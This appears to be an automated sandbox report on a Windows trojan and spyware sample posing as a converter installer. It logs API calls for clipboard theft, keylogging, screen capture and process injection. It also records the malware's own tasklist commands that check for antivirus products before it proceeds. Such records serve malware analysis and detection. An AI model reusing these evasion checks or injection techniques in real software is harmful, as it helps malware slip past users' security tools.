Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9F664 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 35_2_00B9F664
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9F8D3 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 35_2_00B9F8D3
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9F664 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 35_2_00B9F664
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004359B7 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt, 36_2_004359B7
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8AA95 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 35_2_00B8AA95
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00BB9FB4 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 35_2_00BB9FB4
Source: Yara match File source: Process Memory Space: Updater.exe PID: 7592, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01406DB1 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject, 35_2_01406DB1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_0140A239 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount, 35_2_0140A239
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8E3CB CreateFileW,DeviceIoControl,CloseHandle, 35_2_00B8E3CB
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8230F LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 35_2_00B8230F
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8F76E ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 35_2_00B8F76E
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B27070 35_2_00B27070
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B33AD9 35_2_00B33AD9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B5E32F 35_2_00B5E32F
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B424CA 35_2_00B424CA
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B56599 35_2_00B56599
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00BAC844 35_2_00BAC844
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B429E3 35_2_00B429E3
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B4C9C0 35_2_00B4C9C0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B3CBF0 35_2_00B3CBF0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B56C09 35_2_00B56C09
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B92D81 35_2_00B92D81
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B2CE20 35_2_00B2CE20
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B2EE00 35_2_00B2EE00
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B42F23 35_2_00B42F23
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B3F0DA 35_2_00B3F0DA
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B89168 35_2_00B89168
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00BB525A 35_2_00BB525A
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B3D37F 35_2_00B3D37F
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B47746 35_2_00B47746
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B47975 35_2_00B47975
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B41964 35_2_00B41964
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B47BD2 35_2_00B47BD2
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B2DC70 35_2_00B2DC70
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B59D1E 35_2_00B59D1E
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B41FC1 35_2_00B41FC1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409B8A 35_2_01409B8A
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409B91 35_2_01409B91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004100C5 36_2_004100C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042509D 36_2_0042509D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00410130 36_2_00410130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0043A2E0 36_2_0043A2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0041D5AF 36_2_0041D5AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00444620 36_2_00444620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042A6D0 36_2_0042A6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00426800 36_2_00426800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040F970 36_2_0040F970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0043A97E 36_2_0043A97E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042EB60 36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00401000 36_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00410118 36_2_00410118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004431D0 36_2_004431D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004331DE 36_2_004331DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004291E0 36_2_004291E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004241E0 36_2_004241E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00442EB0 36_2_00442EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040F250 36_2_0040F250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040B260 36_2_0040B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040A270 36_2_0040A270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0043E230 36_2_0043E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004432C0 36_2_004432C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004012D5 36_2_004012D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0041E298 36_2_0041E298
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00401328 36_2_00401328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042C3E0 36_2_0042C3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00442380 36_2_00442380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004433B0 36_2_004433B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042F4DD 36_2_0042F4DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00429494 36_2_00429494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004094BF 36_2_004094BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0041F510 36_2_0041F510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004255A4 36_2_004255A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004335B0 36_2_004335B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042D642 36_2_0042D642
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042762D 36_2_0042762D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004386FE 36_2_004386FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004226A0 36_2_004226A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040D760 36_2_0040D760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00441720 36_2_00441720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00443720 36_2_00443720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040A730 36_2_0040A730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042B7D9 36_2_0042B7D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042B7FE 36_2_0042B7FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00442850 36_2_00442850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0041482A 36_2_0041482A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_004038E0 36_2_004038E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00439940 36_2_00439940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00407960 36_2_00407960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00444920 36_2_00444920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00431980 36_2_00431980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042AA40 36_2_0042AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042CA72 36_2_0042CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00420A24 36_2_00420A24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00421B40 36_2_00421B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040DB20 36_2_0040DB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00415BD8 36_2_00415BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00439BA0 36_2_00439BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00414BBF 36_2_00414BBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00444C50 36_2_00444C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00434C60 36_2_00434C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042AC04 36_2_0042AC04
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0043EC20 36_2_0043EC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040ECC0 36_2_0040ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00427CD2 36_2_00427CD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0041ECDE 36_2_0041ECDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040BD70 36_2_0040BD70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00429D00 36_2_00429D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0040ADD0 36_2_0040ADD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00432D80 36_2_00432D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00408DA0 36_2_00408DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00422E50 36_2_00422E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00416E10 36_2_00416E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0042BE10 36_2_0042BE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00406F60 36_2_00406F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00428F00 36_2_00428F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00426F82 36_2_00426F82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00434F80 36_2_00434F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00441F80 36_2_00441F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00409F9C 36_2_00409F9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00404FA0 36_2_00404FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_00409FA8 36_2_00409FA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0041C2A0 appears 176 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0040C8C0 appears 71 times
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: String function: 00B2FA3B appears 33 times
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: String function: 00B4488E appears 34 times
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: String function: 00B41000 appears 41 times
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: String function: 00B4014F appears 40 times
Source: file.exe Static PE information: invalid certificate
Source: file.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: file.tmp.2.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: file.tmp.0.dr Static PE information: Number of sections : 11 > 10
Source: file.tmp.2.dr Static PE information: Number of sections : 11 > 10
Source: file.exe Static PE information: Number of sections : 11 > 10
Source: is-EUGF2.tmp.3.dr Static PE information: No import functions for PE file found
Source: is-5MQFH.tmp.3.dr Static PE information: No import functions for PE file found
Source: file.exe, 00000000.00000003.1677553862.000000007FB6A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs file.exe
Source: file.exe, 00000000.00000003.1676905528.000000000337E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs file.exe
Source: file.exe, 00000000.00000000.1675519930.0000000001059000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs file.exe
Source: file.exe Binary or memory string: OriginalFileName vs file.exe
Source: file.exe Binary or memory string: \OriginalFileName vs file.exe
Source: file.exe Binary or memory string: OriginalFilenamewebpconverter.exeP vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@60/28@1/2
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B94573 GetLastError,FormatMessageW, 35_2_00B94573
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B821C9 AdjustTokenPrivileges,CloseHandle, 35_2_00B821C9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B827D9 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 35_2_00B827D9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B95D7E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 35_2_00B95D7E
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8E2AB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CompareStringW,CloseHandle, 35_2_00B8E2AB
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B88056 CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode, 35_2_00B88056
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B93DBD CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 35_2_00B93DBD
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\hangbird
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: file.exe String found in binary or memory: /LOADINF="filename"
Source: file.exe String found in binary or memory: ] [json.exception.parse errorparse_error, column at line invalid_iteratortype_errorout_of_rangeother_errorSeIncreaseQuotaPrivilege" \bin\EnableVROverlay_x64.exe -dt -nvft -spmon -excludelist_file "\ExcludeList.overlay.txt" \bin\PresentMon_x64.exe -timed -terminate_after_timed -hotkey SCROLLLOCK -output_file "\FrameView.csv" -frameview -multi_csv -stop_existing_session -session_name FrameViewService -dont_restart_as_admin \ExcludeList.txt" -exclude dwm.exe -session_name -spawnprovider -spawnconsumer -terminate_existing signaturedb\NVIDIA Corporation\FrameViewSDK\downloader\mouseLut.json\..\bin\mouseLut.json\bin\nvrla.exe -e \bin{}{
Source: file.exe String found in binary or memory: FrameView SDK service-uninstallFvSvc-service-testservice-install-startRSA1
Source: file.exe String found in binary or memory: ;application/vnd.adobe.air-application-installer-package+zip
Source: file.exe String found in binary or memory: application/vnd.groove-help
Source: file.exe String found in binary or memory: "application/x-install-instructions
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp" /SL5="$40476,2820349,845824,C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" /VERYSILENT
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp" /SL5="$2047E,2820349,845824,C:\Users\user\Desktop\file.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
